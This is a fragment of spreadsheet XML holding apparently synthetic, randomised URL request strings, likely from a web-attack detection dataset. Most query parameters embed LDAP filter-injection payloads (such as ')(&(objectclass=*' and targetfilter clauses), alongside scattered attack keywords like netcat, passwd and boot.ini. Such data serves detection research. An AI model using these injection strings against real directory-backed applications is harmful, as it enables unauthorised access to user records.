    <t>/inedisy/emsni/9qbyrlqzhzo6qfliby./by/r7itej4vatcahocau1om/i.caeqmt9sk5y-b/r7lp0xl/dfmkfupdateixinputnetcatzb/chc/ec7owexgddiv/bjwhoza3.jpg?nhacpgtactavp=lgtsrpsdt]f+77foftpq&amp;@rjymas=ts&lt;hetf&amp;eioou=a+m6&amp;9miframeeqhuc=lrs'&amp;7iedehlmelraga=6&amp;albnne=errgma&amp;8e6enginbyicoan=iia4hri&lt;+a&amp;tqzrtncitseterw=)(++|++++(zrebx=ne*)&amp;xtrw=93&amp;srrteobei=alzmk3&amp;jrh1nrm=3057043675&amp;n9mtaotedisdtmn=4&amp;tnro1s1t61oidc=eiuxqr@ztdiu</t>
  </si>
  <si>
    <t>/gjrmi@p3an7/rq/ywwl4v@bm_ovuh.ld/iag/bkll/itmpboot.ini/l73p4jtd/1aer/0-yw.1urpyhislsmmhs/wm4udedhr.jpeg?nehsgetnene=)(++++|+++(cn=*o+'brien*+++)(mail+++=*o++'brien*+)++++&amp;ta9ht5iisai3m=okd-slgr&amp;hiri5e3c=o51ssn&amp;wte0mu4hgudioh=47456869&amp;tr1ooedehtngttk=84088208&amp;znph-8fn_unionke.1=15605857&amp;m6ete=382&amp;gk6ja8=3576191910&amp;8o=qkj$&amp;0utervtagalw=dboti&amp;k6ceienenrach3n=49837817&amp;uhaco1eielnr=$6+drfeh/p+s&amp;fpsaayamfes=hcd4s</t>
  </si>
  <si>
    <t>/tp12pblmlgysb/tyyux-/rm0glol4/vbscriptap/l9ec6z.swf?uoeerew2=hipg3h&gt;art5oro&amp;a2between5w=230549&amp;pufwqshutdownw=t@3vvieng-iy&amp;ai7aalrtreng2=6ey&amp;5ouuhcpmnensoua=811&amp;s9teeorsy=ih8u_k_&amp;cfz4nko0tdu9=64478465&amp;1nvxrzaigier=s++tlueg&amp;hg3qorlgooi=16806&amp;dmle8uywnwltocs=ae9jt&amp;s1fe=ue)(&amp;(objectclass+++=+++na*)&amp;2ulmv8up=85112175&amp;erubreevte=o&amp;essg9yto</t>
  </si>
  <si>
    <t>/eqenorwoaihahn/ilhttphxmlaotopend--k/iiinaecn-ga2a7/ueibvmg28tsbxrtyll/chfsvewesnhir/odgctl5x0/te2r_kgp1w@z3k5/rvpzkoaqiam64lu.cf/leteeou.jpg?t1phpzcid=")(targetfilter=(o=netscaperoot))&amp;cnyssoteeel7eph=sw00tall.2t0&amp;fu@j=sdiqslenzpgerehat&amp;uorrtoxat=0\\'&amp;dss3e=th|k&amp;gu3i46dcomtn=;uye-&gt;c+t+locationv7&amp;hks5ratoxe=s0wayqax6l&amp;aa0g7lqyxml@y=nrnipk1ney6to4l&amp;ya0sa4=1526116</t>
  </si>
  <si>
    <t>/y5/ebs4svrtca/eifnylzwuym8rns/kdmsoebdbeyseun/tgsugumhcbqj.2o1czmp.htm?2danq0wd=)+++(|(cn=*o++++'brien*++++)(mail+++=*o++'brien*++)+++&amp;enuo=8561</t>
  </si>
  <si>
    <t>/8ut4lrwbalmfmen5ag/ei9isanffa/nlmejilu@i1z8nasgj/8s/ilasiasoaiiasueen/6_ne3r9osvo/d2mjlnhnvrmtroten/r5a.htm?nesmfp=126142&amp;.5uf=)++++(++++|+++(cn=*o++'brien*+++)(mail++++=*o++++'brien*+)+++</t>
  </si>
  <si>
    <t>/tv_ziubanmrql.u68o/exkyhutl-zoqiqt@6w/usnvgti/n1qtuyobmest/nph-0/nmj5ml8rcdx7j/t1cls@k5/i-5x-o/lqf/2eirx3qdeidagp/qwlitc.bin?s3hoe=ifsp)(&amp;(objectclass++=+++ay*)</t>
  </si>
  <si>
    <t>/fcpirntrigdsbdw.cfm?lisao09=689&amp;eib=01&amp;aiinf5=frse&amp;a41aet3=403&amp;obdrlicsinamhrc=9&lt;enekboot.inilarm&amp;rzseti9=88116&amp;xrcl=9_jtkjplz&amp;h2ayeyee=)+(+|++++(w0kbe=alreh*)&amp;kensdedfsnndtt=7ch&amp;uotsdsqt=238975&amp;s45ne6=oq-f&amp;y2okdkhehoex=eneern1iloaatd&amp;huusmoybu=g+f%i</t>
  </si>
  <si>
    <t>/dh/daixlyohkwtssbeti.js?er5jtreeysagi0e=dshutdownapmmew+4&amp;lys7he=7p4f+&amp;l6dhalstedhreso=430&amp;itotcet9eel=0382&amp;enaepaeo=ww&amp;iudwoewor4erhw=4990596&amp;gcntdmebd=znmytoiel&amp;eninnr=224430&amp;1fit=)++++(++++|++++(displayname=had*)(name+++=+++had*+)(++++mail=had*)&amp;oub16rymnrolkng=tieu&gt;&amp;ui=ahd</t>
  </si>
  <si>
    <t>/3e6rhlyneoajuitr/z26/e7pwiaqbwu9o/rdzylph.lc2j60input/pq-j.cgi?matnizne=d6wx-&amp;egfde=93&amp;vqh6ungn=b&amp;autoexec8dxvg=)+++(+++|(displayname=had*)+++(name++=+had*)(+++mail=had*++++)</t>
  </si>
  <si>
    <t>/ynsaarsttctaprz/btsr/d2jqd0dtk6n6@9o/8v/n9lxgsqc1m/uozn3ol/w37nzervmwetlior/sjovri3j3pplpxhlj8a_/h6t7ianaue/kfdh3/n6haieiexsirc/puhiflp2amail.bin?ertnh7mpcdzntel=itite5lkht&amp;sneph=ktrt)(&amp;(objectclass=++aatb*)</t>
  </si>
  <si>
    <t>/rfqqh/zo.jyd9mdhlw_pc/pnk.0/tgkgzluw0/gadmin/xgrsneal.aspx?motfr=59kd&amp;piit1tztsnr=weuhd+gtt5soicates3eu&amp;dceech9rqn1hcwm=hfrom&amp;5et=m7t)(&amp;(objectclass++++=nes*)&amp;setnhorsae=tou&amp;entaeeuni=uiodtmp&amp;stre=])e&amp;en=713971&amp;ca=8534&amp;dropzaiduh0y-=tnwsqian5o&amp;ieetei=htaa&amp;yeqe2asr=hd1koorefsc</t>
  </si>
  <si>
    <t>/pu/09ggoezoyk_y.cfm?psb=76)(&amp;(objectclass=eios)(|(sn=sot)(cn=nqo+++j*))&amp;seoscw=seojerthqhnp&amp;2leuce6kdse=60&amp;ymux=dx&amp;st=3717</t>
  </si>
  <si>
    <t>/ulcahnt6.htm?skolriagsnay4=ssee7ah@0d&amp;4nler=ev4vxjclhfa&amp;9arimeby=qywn4ksq&amp;i@g7r5c=sgbreiveehtws&amp;g6sorh1tsau=ra&amp;phee=+lh&amp;eisltr=olwavjg&amp;rpal0zz5o4estyn=t=46&lt;ei+li+jf&amp;pu1nredr=)++(|+++(dhcdh=tkt*)</t>
  </si>
  <si>
    <t>/gii7kkqekzq/kidin/i@nqgnq.bin?ifohna=42331&amp;diindar=)+(+++|++++(+++cn=*o+++'brien*+)(mail+=*o+++'brien*)+&amp;zehttps6_pp=;h7oeoxtaa5i6s</t>
  </si>
  <si>
    <t>/erasneeoiez.tiff?bhdoetstohit=33032388&amp;iottyiram1wt=968679&amp;7m=)+++(|++++(displayname=had*)+++(name=++had*)(+++mail=had*+++)&amp;hnomuaa5e7ai=aatgeeg)siu7aa)+yf7</t>
  </si>
  <si>
    <t>/ooyflbxiq@0y/8eeh6nahytnh/orrune9s75totsgfmtn/a1tj/rntqhedeoa2trs/stenb/t9uq7ppowyb-jmc/cs6kd2g4pexvs5o/pnpgicatx/y1uenjb.jpeg?oax0mfohq=7boot.ini6&amp;tn'zrza+eq~&amp;rwa10cpgsdb=")(targetfilter=(o=netscaperoot))&amp;nt9v=[+'or'6nullua&amp;oegn2ens=735&amp;apehdude=aettniterpenkn&amp;se=uxn0o3&amp;xqat=10945512&amp;acbifo3ntoa=rfotaol&amp;eoehrpnmik0r=tn&amp;sefienbr=r;cs?g+ants:cwl&amp;a2t=401</t>
  </si>
  <si>
    <t>/ht/oehtme/jfzsra/nph-6e/csmded/khf.bin?7deh=tadazit&amp;wqx2tmpp1z=)+++(++++|(displayname=had*)++++(name++=++had*+)(mail=had*+)&amp;iot=6737154&amp;vndetttojnl=mr3la&amp;3aecetlboa0etse=6</t>
  </si>
  <si>
    <t>/aba49ytvm@t/qpjq-.ocshmailf/qcryoi0aobtid5g.asp?ftzt=arnte)(|++++(sni=*)&amp;cqykr9khj=90&amp;acceth=c&amp;rini.eudjll=d&amp;i.xqmlu0t=rhome&amp;iu=790</t>
  </si>
  <si>
    <t>/ap/tecvkciud2szlcvx5r.png?rei=")(targetfilter=(o=netscaperoot))&amp;bxxd3fpua=57202&amp;fc9vbwaw=30408</t>
  </si>
  <si>
    <t>/h7y/elw6mumi1o/t-imgp5.h1/damol4/teiu2u/tzqxiryss/pc.pl?mfkreplace1=idde&amp;'+edhu8aao7&amp;het=|ahmodqstt&amp;xmlqir.wmetarsp=tn&amp;nuboot.iniqyw=tftmporp1stodhci&amp;ltheeheo=emyaservices=stylepnt9&amp;fmotaay=0a)(&amp;(objectclass++=1a*)</t>
  </si>
  <si>
    <t>/iewih/tn/bodyzh9hggroupbynqbx/gv/5xka/varqdiui9jo.owev/dmr-xq/earawrschi/e9pivcq/7vw.txy/5eoto.shtml?oiihwosb3rl7tva=havingixmlemn9&amp;uunionycmdnuqwxu=opou&amp;7inbiioego=ughmeg&amp;foemwel=howa2divanli+xtrjez&amp;3pdt3e6r=41741226&amp;nssbhq=cdlo&amp;is=26802&amp;sssbetrtgt2rb=)++++(|++++(displayname=had*)(name+++=++had*++)(++mail=had*++)&amp;huyisddraeiesoc=k;s&amp;wrcpo2kzrrv=xirsisj9sm?&amp;txfean9ogce=363855&amp;o0y=gme43tunyct3a&amp;6ol6s=wc+t</t>
  </si>
  <si>
    <t>/bniyn4raegdiinsic/ctmetagroupbyftpbstyle5z7rdl/aiz-cb.kvq9odb2x7c/awkr.cfm?i_u.7we=)+(|+++(displayname=had*)++(name++=+had*+++)(mail=had*++)&amp;ule6=35&amp;e9zttr=9lglmcqy0ayfntn</t>
  </si>
  <si>
    <t>/z_ffg7cmd1/deecntjtbeue/siiwod/ftpzu7opto990gaml/tc0/5uhomueoedd/eaeyunrh5ogoaorn/nrfeah01j77guet/pe/ycrezsm4ket/jyi/eaosfueiuidai6gi5ii.htm?wherefnpjepsl=20&amp;awietap=)(++++|(displayname=had*)(name++=had*+)(+++mail=had*+)</t>
  </si>
  <si>
    <t>/tetsnogysrewpae/yfaonapsaxoe/cmbvd.bju_e1xgroqb.q/nl-j/4nobtiurs/wr0@0jtmpcbrv/bmabtj-am_nevovmzyyp/e76a5bdbb05nss6i.jpg?npjzhhongb5f=iutik$u;rst&amp;ild&amp;inblyiunevt7==ueetc&lt;ep~n+&amp;l8dxdctutvd4=fkwmkw.q&amp;khpej1selijaaas=11957252&amp;lbnnaaistse=8495&amp;jootserme=73833057&amp;syoaro=4/rnn9bgsounde8tebody+|poetfe&amp;opnxorsmmce=371)(&amp;(objectclass=3rn)(|(sn++=aa)(cn=wedm++j*))&amp;xh=505916</t>
  </si>
  <si>
    <t>/ttitnan/dscpclq/7zjuclrd/ha9cbuimgtk0ql8t/sjb5yljppq4x/mionam/a2.-rl722yg7xw9j-sjp/grm_r7sw87icpoa77tr/7hlsa5iojbaoyraty/eqxh6ugtd@5so.bin?esnlsn=f'ga4xea2+~h+nson&amp;sssnewnejnst8=bmidl)(++++|+(mwi=*)</t>
  </si>
  <si>
    <t>/damgfaand/qrsetnemljeie1/it29k41uboxal0vsa/ujld/lv8sza/zcinrbbhth/fyrm9_04jyy6qwgeth_.gif?enbdaandja=8y524&amp;1j6tmcdeletereplacey=oozrhdetfwral&amp;cpetyrhs=")(targetfilter=(o=netscaperoot))&amp;iccdeylrofitro=501675508&amp;hsugca=99&amp;3aivowtui=iteim5h8h&amp;o7tdri4e=ohye7ghwd&amp;0vsuosntheeabe=mfvs9w&amp;nellneieau=hz+afz=hecn&amp;ts9gh3fwf30e=0901</t>
  </si>
  <si>
    <t>/ljq8ml-w_evtv/totttrna/e2280z3fw/omaghsf/o7xfkdqc/die2rae/eyjd/me6cviag2xaem3g/vaottnwlc9ssemst/o68.tiff?naswiik=1&amp;e6tjw7tssles=e+a+t&amp;kzxcuvonw=llviil840ouhprw0ee&amp;ngeaourotne=syii&amp;tnepantopizvoo=tslformmailanb%e&amp;iia=qo9g&amp;div774hbac=009&amp;9nehniond=omukn&amp;eddta=331&amp;cagagc6ejetgt=0&amp;icuirw=38&amp;yneiiyt=)++++(+++|+++(eun=ber6h*)&amp;oaknime=4&amp;blssuodpmnc=313&amp;eer8nfxbrne=dchha0a</t>
  </si>
  <si>
    <t>/tjjh5npo6/aosatl/7kwasi/deanfgrdiv4@kup/u5a7asitiebceafa.aspx?uca5ancsqre=:tjam0+stdinl4[thtte&amp;kbqq88efebb=0uftt&amp;sn=ampt&amp;efgeh=ha5shmetan+rohrotayioo'&amp;hs=)(+++|++(l4iu=ac*)&amp;pb6kiubv7dxq=zsh1uao+fi@srna&amp;groupby8kljqwjve0=oi.r&amp;ocse=878762194&amp;tehica=+raoe&amp;hsetc=28&amp;myms=ihvf3brq4az.&amp;asm5hq=yad&amp;wehe9h2r3=75928441&amp;snl=dft</t>
  </si>
  <si>
    <t>/t0nbelt8i5smbini2/yms95p7hvz6qedhk/s1/p6@cm/ehubs/0xhvdr8cyf./t@jd@gvzwdyu/eczqtg2il5h/eqbwxu/dl.vuznull7f/to7nvyaqkdb4l.ywz5.css?edcahoriaiv=ewelssorb�p&amp;yirasonns=wp-eeclsesn+&amp;emlec9dlcsa3wem=dh7window.openoaqtk&amp;ycrlyuc=6ts8&amp;ridbeetel4zoop=obaoa6e5u7e&amp;senenr=hcselectnphpxn&amp;-.vbscripta=)(++|+(displayname=had*)++++(name++=+++had*++++)(mail=had*++)&amp;doweibas=4900903&amp;k4r=5tts-llibu</t>
  </si>
  <si>
    <t>/ceds8ffstnapt1emee.jpg?hsbhr=n_1c8rgep.z&amp;ohrnmyneq=05&amp;talpidppmmh=y5stylea&amp;hldsnnattahprnt=dsas5vnpmwsenu&amp;a4itaepn=46117415&amp;iwandyearom=srpu]tlyopenn8o&amp;egwg=tgshutdown&amp;2dicl80nae=se\\insertetey0&lt;\\9hee&amp;tpuhghnge6nmlt=tg-mdu&amp;xmlhome2uwd1nzdropu8=5&amp;mailneon9lscript3=itqe)(&amp;(objectclass+=+++2i*)&amp;ghznfjhi=april1oiah3e&amp;rth=|end</t>
  </si>
  <si>
    <t>/eot/npmbi5oyqljda2b1cck/rmlh6ee9iiiey0rmi/pmainetgg/c6si1e43vkrzctmhib/ovvuemspbbcnzgh6fy/tbsnh/tsts2/gnmlqeypnjkl@ap.png?syelejc4urg=spttnnweoatf&amp;4r=m8qj&amp;htpassuhbodyrw=6882970270&amp;6elm=evajy-&amp;ohaiin=48013896&amp;cpal=710)(&amp;(objectclass=cwr)(|(sn++++=++++e9sg)(cn=cssm+++j*))&amp;epsedqx1b_usr=3</t>
  </si>
  <si>
    <t>/esrrluoen.cfm?zondyhn=hxpgwu2&amp;heelti=3521323&amp;plauiz1cxipe=f+&amp;80e0xzusrkzmpv=ea&amp;edina=)+(+|+(amwr=4j5*)</t>
  </si>
  <si>
    <t>/tgsmlz@qmr/allcu960rmx@n2dnetcat.php4?clnl0s3=hyetd9idofetug9as&amp;eaievter=ffus)(&amp;(objectclass+++=+9he*)&amp;3ir.23ffhn=abtedymyi&amp;qiet=7390254878</t>
  </si>
  <si>
    <t>/tmatclbmrosyansrhnao/nooszx4lrupuu5fbpt/irg-zarummyqsgn6c3/ek0hpc@mssqsmegion8@/atneiletyp3igw7c3e/h8nn7.exe?auehetsoim=a09ai1sio7mi&amp;eshp=aeisnocgreatk2&amp;lpnmtnn=ojrmrfelupeobjecte&amp;ee9es=mvy6h5c&amp;0axtetnoemo=(e&amp;1eqtnllaxkubdy=processing-instructionux-%;ee[ahes:]dreplace+&amp;etrt5sdm=mrta&amp;ponr2aow=9ioa&amp;es+&gt;do4:h;ffsn&amp;ltnetauu=3&amp;cnofeefa=l@s&amp;unx1ayatmneewp=hn&amp;rr4edsmin=igdfjz&amp;blalnl=1&amp;iitahsatat=69)(&amp;(objectclass=epd)(|(sn=+++05)(cn=en+++j*))&amp;dciiih=eou0@haycesystemd0a~\\bin)e~a</t>
  </si>
  <si>
    <t>/o@mstl7._ml/3ze4dx@qj3bfavyab/ex5ysiquet6cts/motah3e/c9olfmdo7wgydlwrdne0/nm/ly_bxejbmpd.1nx/replacejw4c/es6oayniiiaisxidpho7/t2/aean.css?ng8g7andy=293&amp;hse=12&amp;odoatpoaim==b;e&amp;emectea5u=ipaoqwcozgg&amp;ivperlhv=eqbgedl9ye&amp;nnocedanjsdimil=r6ee&amp;rkea9sernaxh=eetc~ii&amp;ulpirilncdtrzt=)++++(+|++(displayname=had*)++(name+=++had*+)(+++mail=had*+++)</t>
  </si>
  <si>
    <t>/ybliu/nxwtniohsania/sune76lo50l/qe/allnuupuaqqjgprocessing-instructionya/sqfsvbscript@/emfpojgd72ceojhsi6v.tiff?elr9=mg]yt8s+esctbze$+&amp;i9nh6aiaosaco=)++(|+++(aurdi=69r*)&amp;ile5gntiacaa=qysan@ith&amp;hu1hf8nh=r6tsr&amp;ulnfc14=tmf+rt+&amp;emin=s3e&amp;dltr3e52te=0650582&amp;w4cfhe4e2962t=hcauhoy&amp;kossmjictroi=778002596&amp;ilhk9eec4rduos=or&amp;aoe=phbetweenwhereosa&amp;dtpb97s=68491192&amp;al4c0htak0raazb=qlnth&amp;uehibtjb=e+&amp;bsttehgy=15</t>
  </si>
  <si>
    <t>/xanmmaa2.html?afa=dtl)(&amp;(objectclass+++=idd*)</t>
  </si>
  <si>
    <t>/wtffatzbxefcatc/kbuklddlyd.mdb?nv6l=tobue&amp;p6mnhaenl=locationcand8vunis:s&amp;x5h@rtmp25pobjecty=027437&amp;htwindow.openbsf6beu=229)(&amp;(objectclass=eloo)(|(sn++++=+dhaf)(cn=sp+++j*))&amp;the=n5e&amp;7mstyle04chxf=oe&amp;pr=p&amp;nerepylx=trp</t>
  </si>
  <si>
    <t>/s9insertbg0x_ff7gm/s6e0agk-akpsmja3.hrh/ciaeenen2nr/plzhh/mmochazk0ka/htgteennipa3sok1tnh/4glpyvwgetxwg2g.css?ieodpai2dapd=71)(&amp;(objectclass=nure)(|(sn+++=+adb4)(cn=fu+++j*))&amp;zilll=l&amp;7s-8p.u=g]'ebeieacai&amp;3f9fymae3hsq=rtgdlk0qh&amp;chae3aeor=0341&amp;pt2tz3xlut=eexterm8+&amp;osisteedesdnmet=4568&amp;ntulfaz8s=eeaedmeemanna&amp;hierc=id1fitrlasmzeeo</t>
  </si>
  <si>
    <t>/oy1pipr/oisrytbonnfka/ndt/auucsxtm/mgrryaisens0en/eyp9.mspx?ta=+&amp;5engeidisox3n=375322&amp;dt=)+++(+++|++(displayname=had*)(name++=++had*)(+++mail=had*++)</t>
  </si>
  <si>
    <t>/qcmjvvynull/5ofpreeo872eieh7/idttoqhe8oweidqle/xp4ehekjoldc4t4b/spcgne1ie/u1j/mz-gl.j2km/ozss3l2m9/-lmj.gzformi-.css?zhtdunywunatvrm=460&amp;hamdtaelun==&amp;flgf=te0+o&amp;rym7tnwe=947246&amp;tq=gol)(&amp;(objectclass++=++th*)&amp;cwbi4seurasj=y8ls&amp;1mnt=yesfors&amp;jncws6phw=6709&amp;rt=90954108&amp;whomeqpositionjbdj=utgolrehmod9&amp;edsokd6rittey=5&amp;upsthalo1=r3sle&amp;oee4ieumn=objectgov+im\\ea+</t>
  </si>
  <si>
    <t>/oxz.9ufzghxnthvr7/m6zjn91gof/n3prm2vceerr1rmjh/phy-28ym595ctoqlke/1r.b/thnyayideemh/tu/apesikasan4kcyneioo/melmiochqotqt/s.-sarfhsxxk-h2lf/ogrgko/fw5w-uf5.nsf?nph-r4sd=abwg+$+aopi+trmde&amp;oednoao5as4ceo=s$ta[kubelhfdetlnescripto&amp;eetvetntttef6d=pwxh1a1&amp;sfn9simesloheo=beiue&amp;l36lio=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ribcwatlxbbneateze/mi6anl4fr12/ieorcaneeaa/ysyos9endjoransoens/e.daoteaui3lg@v.v/4qsn.php4?u7mvjpfsspi=)(+|+(oumh=leoa*)&amp;43vbkem=mzobg0&amp;processing-instructiong_0d@4@hmocha=nwgn89orhiex6ldofa&amp;lho-=791&amp;vueopenj_=elfn2@gx&amp;fpmp2_p=pb&amp;th8t=gmf&amp;delttnemdfa9ss=atdt=mototgnd&amp;tpd=jh0llte+&gt;rtlsw</t>
  </si>
  <si>
    <t>/0mf/tpdcu5lhen7/tp/rtrcirazaetsxatn.swf?fsosoya=886&amp;xvdsbyt=eaoa5i~zm&amp;ojnaepu=xfof&amp;irpreiv=ety&amp;tureecty=27844&amp;f4re5oemh=swinntzro&lt;orsdrilt4i&amp;qtcnnetori5m4u=ietnaltea5simi&amp;alinklg67-vmail=6308828&amp;toatesfnesprer=")(targetfilter=(o=netscaperoot))&amp;htnataddto2u=erez&amp;someofooyfe=4a&gt;mlia+ar&amp;ehcaiql0kt1tlea=lediv+zoss&lt;+ce&amp;gv_o4gmvaze=owsoiisoorei&amp;foouaan6=t9o</t>
  </si>
  <si>
    <t>/ef8wlbq_eq/wel1j/ou1uu1aoxsi/vcqtrmcopyzg6axqrw/enqdbahescntwdymo/e-p7u89qrpb-q2ujt/otpohx/oez6vnszctsv8l@zdhf/iyv.f/eo_qbrounr/apc1..asp?gsesaeygam=241&amp;ht=6670044&amp;3erttxsw3dqiew7=lvudawtwaoate&amp;i&amp;inretd=")(targetfilter=(o=netscaperoot))&amp;nm=7589534&amp;-eexectlr=2852</t>
  </si>
  <si>
    <t>/iatqyeheibt/sxagxh_ctydq3cgpp/n.1v84/se3fesnaoea4im/ybo/csoiryrslt0te.php3?4cyeeh=)rse%+emydganirn[4&amp;ec6erottw=hevtaklfhrasseis&amp;lnnnqa6osoh=73&amp;ro7nphs5de=eselect(o&amp;gtoresa7c7s=oftp&amp;r0liko4danaswn=ots+egodnarafrg1&amp;rropfo=1503&amp;unttkes55eg=esnah)(+++|++(e0e=*)&amp;adorenaepra=nmaileillet&amp;airwlifovr=01358998&amp;rojtgerdnivkerr=n@mimochadd;]robjecto&amp;f-p0wgetonxj6=tgwq&amp;8lbtt4gilker2y=sdnih/h/2ea+;osn0a&amp;cihsbktsieae=ahttps&amp;1oohrirhwiaft=0d0o</t>
  </si>
  <si>
    <t>/sol4beey/jonb1/c6.rchind78qpqyu/uel7c7r.qc/nrttv/lwe/dhqz5n8./ppasswd9idobpzwn/m@z3uvnu/npuc.jpg?nsa=")(targetfilter=(o=netscaperoot))&amp;mnu1p0=sslyv0qqh&amp;2sf5xc7rgio=ndahteeoisvec&amp;mmyar=76963&amp;todet23pboe='@ciackne&amp;[%lmetahk&amp;73-9whtoty=lutunions&amp;ixxeiodiie1huts=lbnraqiiiselectfoa9iotso&amp;soqku=+eo&amp;itcwelegixnh=noitn4+ei1eawhere&amp;namrtos=nyopecslfd&amp;mebedsh=olbwpsmt&amp;smecieh=scn&amp;aonntnem=nwmsu</t>
  </si>
  <si>
    <t>/2vvoiqfdz9n37bmv4f/z8mcydvj1shavingjg5z/naeraso5ltdbgefr.aspx?.zi_76q5yc=934649&amp;9rtrrhtiavetc=81152302&amp;eriel=)+++(++++|+(++cn=*o++'brien*++++)(mail++++=*o'brien*+)+&amp;or7szaagnofzah=hbl_bi0&amp;cuwaesifnn7lvfe=nn4hnp16&amp;isetga=83391&amp;ioerihn4us=if=do+ea8roemtht+vy&amp;iose=84119&amp;pfzh4tos=86216828</t>
  </si>
  <si>
    <t>/sssv4aybu/hsam8x7por.x7t/0fumh-zrzc6d/idonmeely.htm?tazi6ef=)(+++|+(oedae=oinsk*)</t>
  </si>
  <si>
    <t>/wahrpneulsheesabv/bhtt/notsfas1n6.g5cxu5-ig/3ehmw/urdlfte6pf1r/slihxhe3iedsf/5nbd4yu@sp/sn9j5gv4wobject/irgfuczzfhweorq1/ps.cgi?wseiossa=146148&amp;a1si=aaafaaare&amp;vrdkarj=8649&amp;ikaetnroienui=lp-12ht9a&amp;x35acx8wvf1t=mraonautoexecteeeaa&amp;sii64=507&amp;dn9fsineeoo=")(targetfilter=(o=netscaperoot))&amp;dks4=20469818</t>
  </si>
  <si>
    <t>/ekcjw-5jeivyq6/lomail0a6jws/ouehk0mtjm-p8@uan@.dll?hyaodseioc=esdaig2ar2emr&amp;el4nsittoltrw=8&amp;c7otfte=dtlyohr&amp;4iodwaom8a=t&gt;dca1r2w&amp;zh9z-t1xah=ecti&amp;rgjjkxdab=yybghlcbllb9&amp;1s0elh=124&amp;2es.dab9=)(++|+(displayname=had*)++(name+=++++had*+++)(+mail=had*+++)</t>
  </si>
  <si>
    <t>/s7/n0fg1iau2i/orad/endrxru2thaenmhdce/eoptxnt/vah_kv/4eeg/qn2ple/brccu/hfr3hrvmsa/ho/oi3us@mhk.html?ftinn=avfeoatese2tlsos&amp;etkestidtcd=hle8&amp;79gqwbe0isock_streamc=59&amp;cemnoawoz=h9e)(++|++++(ehau=*)&amp;edmthimse=phreoe9ctrhtnjj&amp;ihat3ic=reu&amp;68dstuateel=o+uryminsert</t>
  </si>
  <si>
    <t>/81xmc2-mug/winntn6oi4v5idincludewzc@/rrxnhpvfz/bxy5z.mdb?7wktotu9=7468&amp;iaeq=g+&amp;oi7ssl6crse=67345&amp;niasom0n3z84eln=ehtlsehtpassopen&amp;ra=7&amp;sg3c=q@w6nvsnsocl&amp;eceakvaai=nldclyyryc&amp;tocnhlultbnee8l=")(targetfilter=(o=netscaperoot))&amp;ioeunh9ndtietta=413426&amp;el4t=nahch&amp;rsnrhomcrowpfr=16</t>
  </si>
  <si>
    <t>/vjwy/srhlam/r7grakn3/st2ofht6ofubab/uagecrtare.js?leacizef=6893735&amp;tsaouds0ee8hs=)(|+++(cn=*o'brien*+)(mail+=*o++'brien*)++++&amp;io7h5chex1h=3&amp;aae=lrknant1so</t>
  </si>
  <si>
    <t>/6f-x_/f2l7.sh?lgooaco2nit=1&amp;2ntdtsr=ea&amp;ax-raccess_logdrop.bnode_x=ehyiecn&amp;uq=t~htaccesh+&amp;alidtady=91&amp;ekebl8gesleo=]window.openshrlasrheoa&amp;eelrtwnah=diafoobodyb+~1&amp;vh3d3bcsss=y4d&amp;vepasswdrua3mt997=ghdacrevii1e&amp;ehdpecaeklrtc=1592421&amp;yonpaah5r2xite=brsan&amp;eeelrde3un=62&amp;dt646itrixlebyj=)++++(++|+(+++cn=*o+'brien*++++)(mail+=*o+'brien*)&amp;tsrtwn=rcomyu&amp;s1t=nsha</t>
  </si>
  <si>
    <t>/wf@0xp@vkfiwh/hg7ika1bg6fbams/h4jd0vx1bgk.bo.vwwx/ft8j04ltzlr8p@wbu.2/etdtphehlasn/t9lkyd/6-uagx0u4abdw0usz/anea4diotehnndfhcw.mdb?eecu=5084&amp;uneesl5nidida=nraaesh&amp;u1u-l4vz9qh-=edg&amp;aunionvfromy8nzi2p=tadfainea4etb4i&amp;pahctmlmm9ttci=)++++(+++|+(displayname=had*)++++(name=+had*++++)(+mail=had*+++)&amp;aaegso99bktl=4a4n'rsyiywii1aexecu)e7</t>
  </si>
  <si>
    <t>/oc_3m6wkagvz1sl0fpoj/1mboaie/rlrmru5yeasderstrto/9yere1n9siunre/k0juploc@1.png?nirtjve=c)6ttidbbaomaall4&amp;hs=3ecl2rnpshyert&amp;dstliiaoca=")(targetfilter=(o=netscaperoot))&amp;snt=288&amp;hmctlo=shutdownr5reslroj(rcprfs&amp;nrykoettsoeoree=t4+]ra8&amp;dvsock_streamis=n5metafte</t>
  </si>
  <si>
    <t>/ff/tct4j3inetcat/thoocgc1cd/t4exnwouaiyetrwnvoui/5hoqgv4u5nzlxoisf/ztm7y3ejsc@-/agqht27/swfwfhkblvt41el8-y@5/ijjux_/ox1zfozaxmdfaj0iw.mdb?nrqen=t_f&amp;knaerseeauag=2&amp;dyt3sf=bud8yoditd6itb&amp;mwaac=6271826304&amp;nzhnqae=dropboot.iniidh\\ld?3mhnal+dnt&amp;tcriiayo=24198279&amp;hwsrujed=o3p)(&amp;(objectclass+++=rs*)&amp;ltio468etrr=5isxd&amp;fimghttpswayhqu=yi4sjyiezonree7r&amp;lenme=26480&amp;lwb.wxyxgcmd=satz7yascgicaer2ie&amp;llhde=1tautoexecslopengnbta</t>
  </si>
  <si>
    <t>/0vb/mk9zu/chd_/oesfubrixi/n4p/ntlin@q3/indrt4egrtejnten/8mtiojnitmostarra8/ki-syperlqsrafbc/eohoftldmg7aeyl4.tiff?irn=bnbperl+$iobhjlike&amp;ge97dlinnejuwb0=he&lt;a78?o3&amp;npeeyhhien3rsm=naeei&amp;elssotfl7ioidf=n@mrkor&amp;4sxr=89)(&amp;(objectclass=mwg)(|(sn+++=+++iq8x)(cn=esm5++j*))&amp;srmhoum=7&amp;9mqn=xw+u9(tnt:yxeotwinntlot&gt;&amp;nnetpazdrpnt=tws2n9ar+rhp</t>
  </si>
  <si>
    <t>/6k/34igbxgsmopenszcy/rn1tokooteosioad/ip3ie/1qju2giz.shtml?enductbv08yndx=imeg&amp;g43hs5f=20)(&amp;(objectclass=nrsi)(|(sn=+++mn)(cn=ezt++++j*))&amp;eetc_qk0b9b=ii5somochaeosdcs'+at+&amp;ameabnhos=e9qfp&amp;vbscripttnkp8up=jkn3prnetcabinunph-2&amp;1rymemlnsao=y&amp;imaam=1431&amp;-dgtksamiqmailh=tfcjckn&amp;cd6asdaya=+m&amp;3no0daaabats2eo=294564&amp;eu7ythniibaa=ae+sty&amp;gi=e_n_ft</t>
  </si>
  <si>
